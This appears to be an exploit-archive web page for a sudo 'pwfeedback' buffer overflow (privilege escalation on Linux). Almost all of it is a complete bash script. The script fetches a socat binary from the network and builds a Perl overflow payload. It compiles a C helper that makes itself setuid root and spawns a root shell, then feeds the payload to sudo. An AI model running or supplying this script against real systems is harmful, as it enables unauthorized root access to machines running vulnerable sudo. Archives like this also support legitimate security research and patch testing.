Search for hundreds of thousands of exploits

"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow"

Author

Exploit author

"Dylan Katz"

Platform

Exploit platform

linux

Release date

Exploit published date

2020-02-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/bin/bash
# We will need socat to run this.
if [ ! -f socat ];
then
    wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
    chmod +x socat
fi

cat <<EOF > xpl.pl
\$buf_sz = 256;
\$askpass_sz = 32;
\$signo_sz = 4*65;
\$tgetpass_flag = "\x04\x00\x00\x00" . ("\x00"x24);
print("\x00\x15"x(\$buf_sz+\$askpass_sz) .
     ("\x00\x15"x\$signo_sz) .
     (\$tgetpass_flag) . "\x37\x98\x01\x00\x35\x98\x01\x00\x35\x98\x01\x00\xff\xff\xff\xff\x35\x98\x01\x00\x00\x00\x00\x00".
     "\x00\x00\x00\x00\x00\x15"x104 . "\n");
EOF

cat <<EOF > exec.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
        printf("Exploiting!\n");
        int fd = open("/proc/self/exe", O_RDONLY);
        struct stat st;
        fstat(fd, &st);
        if (st.st_uid != 0)
        {
                fchown(fd, 0, st.st_gid);
                fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
        }
        else
        {
                setuid(0);
                execve("/bin/bash",NULL,NULL);
        }
return 0;
}
EOF
cc -w exec.c -o /tmp/pipe
./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"&
sleep 0.5
export SUDO_ASKPASS=/tmp/pipe
sudo -k -S id < /tmp/pty
/tmp/pipe
Release DateTitleTypePlatformAuthor
2020-02-06"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow"locallinux"Dylan Katz"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48052/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.